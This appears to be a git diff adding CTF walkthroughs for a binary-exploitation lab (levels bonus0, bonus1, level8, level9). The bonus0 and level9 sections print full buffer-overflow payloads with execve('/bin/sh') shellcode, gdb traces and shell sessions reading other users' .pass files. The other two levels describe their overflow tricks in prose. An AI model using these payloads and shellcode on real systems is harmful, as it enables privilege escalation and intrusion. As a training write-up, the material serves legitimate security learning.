diff --git a/bonus0/Ressources/walkthrough.md b/bonus0/Ressources/walkthrough.md new file mode 100644 index 0000000..0244400 --- /dev/null +++ b/bonus0/Ressources/walkthrough.md @@ -0,0 +1,61 @@ +The program segfault when 2nd string is 20 char longs + + +``` +Starting program: /home/user/bonus0/bonus0 + - +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa + - +AAAABBBBCXXXXDDDEEEE +aaaaaaaaaaaaaaaaaaaaAAAABBBBCXXXXDDDEEEE��� AAAABBBBCXXXXDDDEEEE��� + +Program received signal SIGSEGV, Segmentation fault. +0x58585858 in ?? () +``` + +we need to find where our 'a's are stored in the stack, each call to p reads so we will stop after the 1st and proceed to do a search. + +It doesn't work, only thing we can find are a string of 20 'a's near eax. + +We can see there is a strcpy just after both calls to p, and p writes to the same address, so maybe we can do something with that, considering the second string will override the first. + +Still doesn't work, maybe check read's return in p function ? + +Got it at 0xbfffe680, let's leave the function and check if the data's still there + +during second read call, we see our data is still there, but the beginning have been override by our second string. Maybe we can ditch the first string entirely ? + +let's try putting our shell code 3 characters after the 'X's and replace the 'X's with 0xbfffe690 + +``` +bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt + File "", line 1 + print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68') + ^ +SyntaxError: invalid syntax +bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf'+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt +bonus0@RainFall:~$ echo "a" > 1.txt +bonus0@RainFall:~$ (cat 1.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0 + - + - +a AAAAAAAAA����AAA1��F��� +whoami +bonus0@RainFall:~$ +``` + +It's doesn't work with an empty first file, let's just put it twice so we don't have to worry about strings overriding or something. +Notice we use the full path of the binary to avoid the need for a NOP slide. + + +``` +bonus0@RainFall:~$ (cat test.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0 + - + - +AAAAAAAAA����AAA1��FAAAAAAAAA����AAA1��F��� AAAAAAAAA����AAA1��F��� +whoami +bonus1 +cat /home/user/bonus1/.pass +cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9 +``` + +:) diff --git a/bonus1/Ressources/walkthrough.md b/bonus1/Ressources/walkthrough.md new file mode 100644 index 0000000..7c3c186 --- /dev/null +++ b/bonus1/Ressources/walkthrough.md @@ -0,0 +1,5 @@ +We can see using ghidra that we need the first number to be less than 10, but then we need it to be equal to 0x574f4c46, so we will have to change it and the only way to do that is by using the memcpy between the two conditional statements. + +But the memcpy uses the result of atoi * 4 for the size of the cpy. But atoi result should be negative. + +We will use c's wrapping overflow behavior for this problem, and memcpy will override the atoi result position with the desired number. diff --git a/level8/Ressources/walkthrough.md b/level8/Ressources/walkthrough.md new file mode 100644 index 0000000..4efb537 --- /dev/null +++ b/level8/Ressources/walkthrough.md @@ -0,0 +1,2 @@ +For this level, using ghidra we can see that there is a conditional statement that will open a shell. We need the 9th character of the string auth to be different than 0. We can overflow the buffer by adding trailing characters to the service prompt after the auth command. +We can also input the service command twice in a row to do that. diff --git a/level9/Ressources/walkthrough.md b/level9/Ressources/walkthrough.md new file mode 100644 index 0000000..a53926c --- /dev/null +++ b/level9/Ressources/walkthrough.md @@ -0,0 +1,44 @@ +For the last level of the mandatory part, we notice there is a twist, as the binary seems to be a cpp code. We don't seem to see any shell or pass reading so we are going to use a shellcode. + +Let's try to make the program segfault with 'A's it segfault from 109, if we put 112 in gdb with 'B's at the end, we get this segfault + +``` +(gdb) i r +eax 0x42424242 1111638594 +ecx 0x42424242 1111638594 +edx 0x804a07c 134520956 +ebx 0x804a078 134520952 +esp 0xbffff6a0 0xbffff6a0 +ebp 0xbffff6c8 0xbffff6c8 +esi 0x0 0 +edi 0x0 0 +eip 0x8048682 0x8048682 +eflags 0x210287 [ CF PF SF IF RF ID ] +cs 0x73 115 +ss 0x7b 123 +ds 0x7b 123 +es 0x7b 123 +fs 0x0 0 +gs 0x33 51 +(gdb) x/i $eip +=> 0x8048682 : mov (%eax),%edx +(gdb) +``` + +later in the code, we got this + +```0x8048693 call *%edx``` + +That means we can put the target address we want to jump to at any point in the string, and put the adress of this at the 109-112 bytes. + +We will target our shellcode with it. + +``` +level9@RainFall:~$ ./level9 `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"` +$ whoami +bonus0 +$ cat /home/user/bonus0/.pass +f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728 +``` + +:)